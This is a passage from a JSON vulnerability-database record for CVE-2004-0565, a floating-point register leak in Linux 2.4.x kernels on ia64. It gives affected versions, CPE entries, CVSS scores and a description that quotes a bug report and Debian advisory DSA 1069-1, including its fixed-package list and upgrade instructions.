        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.2"
      },
      {
        "model": "linux mandrake ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.1"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.1"
      },
      {
        "model": "multi network firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.0"
      },
      {
        "model": "corporate server x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "corporate server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.25"
      },
      {
        "model": "kernel -ow1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel -pre9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel -ow2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.22"
      },
      {
        "model": "kernel pre7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.20"
      },
      {
        "model": "kernel -pre6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel pre-8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18x86"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.1"
      },
      {
        "model": "kernel .0-test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test12",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "10687"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000211"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-044"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0565"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:mandrakesoft:mandrake_multi_network_firewall:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:trustix:secure_linux:2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:trustix:secure_linux:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux_corporate_server:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:gentoo:linux:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:trustix:secure_linux:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0565"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Arun Sharma",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "33773"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-044"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2004-0565",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.1,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2004-0565",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "VHN-8995",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2004-0565",
            "trust": 1.8,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200412-044",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-8995",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8995"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000211"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-044"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0565"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Floating point information leak in the context switch code for Linux 2.4.x only checks the MFH bit but does not verify the FPH owner, which allows local users to read register values of other processes by setting the MFH bit. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ Linux In the kernel, context switch code is used to switch computation processing between threads. Also, ia64 In architecture, FPH ( High-order register of floating point register ) Change information to user mask (UM) In the register MFH Store in register. this FPH If the register is changed, MFH A bit is set in the register. Local attackers who exploit this issue MFH It is possible to read the register values of other processes by creating a program that sets the bits. Also, ia64 In architecture Linux Kernel 2.4.x In certain circumstances, a local attacker could cause a kernel panic, resulting in a system out of service (CAN-2004-0447) Has been reported, but it is unknown at present. still, ia64 Other architectures are not affected by these issues.Please refer to the \u201cOverview\u201d for the impact of this vulnerability. The Linux kernel is reported prone to a data-disclosure vulnerability. \nReportedly, this issue may permit a malicious executable to access the contents of floating-point registers that belong to another process. Linux is an open source operating system.  Opened by  (Arun Sharma) on 2004-05-28 17:46\n\nDescription of problem:\n\nLinux 2.4.x and the SLES9/ia64 kernels have a floating point leak. \n\nVersion-Release number of selected component (if applicable):\n\n2.4.21-12.EL. \n\nHow reproducible:\n\nRun N (= number of cpus) copies of the program secret and one copy of\nthe program check. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1069-1                    security@debian.org\nhttp://www.debian.org/security/               Martin Schulze, Dann Frazier\nMay 20th, 2006                          http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage        : kernel-source-2.4.18,kernel-image-2.4.18-1-alpha,kernel-image-2.4.18-1-i386,kernel-image-2.4.18-hppa,kernel-image-2.4.18-powerpc-xfs,kernel-patch-2.4.18-powerpc,kernel-patch-benh\nVulnerability  : several\nProblem-Type   : local/remote\nDebian-specific: no\nCVE IDs        : CVE-2004-0427 CVE-2005-0489 CVE-2004-0394 CVE-2004-0447 CVE-2004-0554 CVE-2004-0565 CVE-2004-0685  CVE-2005-0001 CVE-2004-0883 CVE-2004-0949 CVE-2004-1016 CVE-2004-1333 CVE-2004-0997 CVE-2004-1335 CVE-2004-1017 CVE-2005-0124 CVE-2005-0528 CVE-2003-0984 CVE-2004-1070 CVE-2004-1071 CVE-2004-1072 CVE-2004-1073 CVE-2004-1074 CVE-2004-0138 CVE-2004-1068 CVE-2004-1234 CVE-2005-0003 CVE-2004-1235 CVE-2005-0504 CVE-2005-0384 CVE-2005-0135\n\nSeveral local and remote vulnerabilities have been discovered in the Linux\nkernel that may lead to a denial of service or the execution of arbitrary\ncode. The Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\n\n CVE-2004-0427\n\n     A local denial of service vulnerability in do_fork() has been found.     \n\n CVE-2005-0489\n\n     A local denial of service vulnerability in proc memory handling has\n     been found. \n\n CVE-2004-0394\n\n     A buffer overflow in the panic handling code has been found. \n\n CVE-2004-0447\n\n     A local denial of service vulnerability through a null pointer\n     dereference in the IA64 process handling code has been found. \n\n CVE-2004-0554\n\n     A local denial of service vulnerability through an infinite loop in\n     the signal handler code has been found. \n\n CVE-2004-0685\n\n     Unsafe use of copy_to_user in USB drivers may disclose sensitive\n     information. \n\n CVE-2005-0001\n\n     A race condition in the i386 page fault handler may allow privilege\n     escalation. \n\n CVE-2004-0883\n\n     Multiple vulnerabilities in the SMB filesystem code may allow denial\n     of service of information disclosure. \n\n CVE-2004-0949\n\n     An information leak discovered in the SMB filesystem code. \n\n CVE-2004-1016\n\n     A local denial of service vulnerability has been found in the SCM layer. \n\n CVE-2004-1333\n\n     An integer overflow in the terminal code may allow a local denial of\n     service vulnerability. \n\n CVE-2004-0997\n\n     A local privilege escalation in the MIPS assembly code has been found. \n \n CVE-2004-1335\n \n     A memory leak in the ip_options_get() function may lead to denial of\n     service. \n      \n CVE-2004-1017\n\n     Multiple overflows exist in the io_edgeport driver which might be usable\n     as a denial of service attack vector. \n \n CVE-2005-0124\n\n     Bryan Fulton reported a bounds checking bug in the coda_pioctl function\n     which may allow local users to execute arbitrary code or trigger a denial\n     of service attack. \n\n CVE-2005-0528\n\n     A local privilege escalation in the mremap function has been found\n\n CVE-2003-0984\n\n     Inproper initialization of the RTC may disclose information. \n\n CVE-2004-1070\n\n     Insufficient input sanitising in the load_elf_binary() function may\n     lead to privilege escalation. \n\n CVE-2004-1071\n\n     Incorrect error handling in the binfmt_elf loader may lead to privilege\n     escalation. \n\n CVE-2004-1072\n\n     A buffer overflow in the binfmt_elf loader may lead to privilege\n     escalation or denial of service. \n\n CVE-2004-1073\n\n     The open_exec function may disclose information. \n\n CVE-2004-1074\n\n     The binfmt code is vulnerable to denial of service through malformed\n     a.out binaries. \n\n CVE-2004-0138\n\n     A denial of service vulnerability in the ELF loader has been found. \n\n CVE-2004-1068\n\n     A programming error in the unix_dgram_recvmsg() function may lead to\n     privilege escalation. \n\n CVE-2004-1234\n\n     The ELF loader is vulnerable to denial of service through malformed\n     binaries. \n\n CVE-2005-0003\n\n     Crafted ELF binaries may lead to privilege escalation, due to \n     insufficient checking of overlapping memory regions. \n\n CVE-2004-1235\n\n     A race condition in the load_elf_library() and binfmt_aout() functions\n     may allow privilege escalation. \n\n CVE-2005-0504\n\n     An integer overflow in the Moxa driver may lead to privilege escalation. \n\n CVE-2005-0384\n\n     A remote denial of service vulnerability has been found in the PPP\n     driver. \n\nThe following matrix explains which kernel version for which architecture\nfix the problems mentioned above:\n\n                                     Debian 3.0 (woody)\n     Source                          2.4.18-14.4\n     Alpha architecture              2.4.18-15woody1\n     Intel IA-32 architecture        2.4.18-13.2\n     HP Precision architecture       62.4 \n     PowerPC architecture            2.4.18-1woody6\n     PowerPC architecture/XFS        20020329woody1            \n     PowerPC architecture/benh       20020304woody1\n     Sun Sparc architecture          22woody1    \n\nWe recommend that you upgrade your kernel package immediately and reboot\nthe machine. \n\nUpgrade Instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get dist-upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n\n  These files will probably be moved into the stable distribution on\n  its next update. \n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show \u003cpkg\u003e\u0027 and http://packages.debian.org/\u003cpkg\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.3 (GNU/Linux)\n\niD8DBQFEb9YGXm3vHE4uyloRAkhXAJ0e1RmUxVZSbQICFa/j07oKPfWRVwCeMrhj\nwYGegwosZg6xi3oI77opLQY=\n=eu/T\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. \n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n  Source archives:\n\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.dsc\n      Size/MD5 checksum:      692 27f44a0eec5837b0b01d26c6cff392be\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.tar.gz\n      Size/MD5 checksum:    27768 6c719a6343c9ea0dad44a736b3842504\n    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.dsc\n      Size/MD5 checksum:      792 d7c89c90fad77944ca1c5a18327f31dd\n    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.tar.gz\n      Size/MD5 checksum:  1013866 21b4b677a7a319442c8fe8a4c72eb4c2\n    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.dsc\n      Size/MD5 checksum:      672 4c353db091e8edc4395e46cf8d39ec42\n    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.diff.gz\n      Size/MD5 checksum:    71071 7012adde9ba9a573e1be66f0d258721a\n    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz\n      Size/MD5 checksum: 32000211 237896fbb45ae652cc9c5cecc9b746da\n\n  Architecture independent components:\n\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.18-sparc_22woody1_all.deb\n      Size/MD5 checksum:  1521850 75d23c7c54094b1d25d3b708fd644407\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.19-sparc_26woody1_all.deb\n      Size/MD5 checksum:  1547874 c6881b25e3a5967e0f6f9c351fb88962\n    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5_all.deb\n      Size/MD5 checksum:  1014564 0e89364c2816f5f4519256a8ea367ab6\n    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody3_all.deb\n      Size/MD5 checksum:  1785490 c66cef9e87d9a89caeee02af31e3c96d\n    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3_all.deb\n      Size/MD5 checksum: 25902158 321403201a198371fd55c9b8ac4583f7\n\n  Sun Sparc architecture:\n\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u_22woody1_sparc.deb\n      Size/MD5 checksum:  3923058 db7bbd997410667bec4ac713d81d60ea\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u-smp_22woody1_sparc.deb\n      Size/MD5 checksum:  4044796 106fcb86485531d96b4fdada61b71405\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u_26woody1_sparc.deb\n      Size/MD5 checksum:  3831424 347b0c290989f0cc99f3b336c156f61d\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u-smp_26woody1_sparc.deb\n      Size/MD5 checksum:  3952220 f7dd8326c0ae0b0dee7c46e24023d0a2\n\n  Big endian MIPS architecture:\n\n    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody5_mips.deb\n      Size/MD5 checksum:  3890804 7348a8cd3961190aa2a19f562c96fe2f\n    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody5_mips.deb\n      Size/MD5 checksum:  2080618 d52d00e7097ae0c8f4ccb6f34656361d\n    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody5_mips.deb\n      Size/MD5 checksum:  2080830 db7141d3c0d86a43659176f974599cc2\n    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody5_mips.deb\n      Size/MD5 checksum:    15816 c31e3b72d6eac6f3f99f75ea838e0bf9\n\n  These files will probably be moved into the stable distribution on\n  its next update",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0565"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000211"
      },
      {
        "db": "BID",
        "id": "10687"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8995"
      },
      {
        "db": "PACKETSTORM",
        "id": "33773"
      },
      {
        "db": "PACKETSTORM",
        "id": "46506"
      },
      {
        "db": "PACKETSTORM",
        "id": "46508"
      },
      {
        "db": "PACKETSTORM",
        "id": "46509"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2004-0565",
        "trust": 3.2
      },
      {
        "db": "BID",
        "id": "10687",
        "trust": 2.8
      },
      {
        "db": "SECUNIA",
        "id": "20202",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "20338",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "20162",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "20163",
        "trust": 1.7
      },
      {
        "db": "XF",
        "id": "16644",
        "trust": 1.4
      },
      {
        "db": "BID",
        "id": "10783",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000211",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-044",
        "trust": 0.7
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1069",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1067",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1070",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1082",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "64",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:10714",
        "trust": 0.6
      },
      {
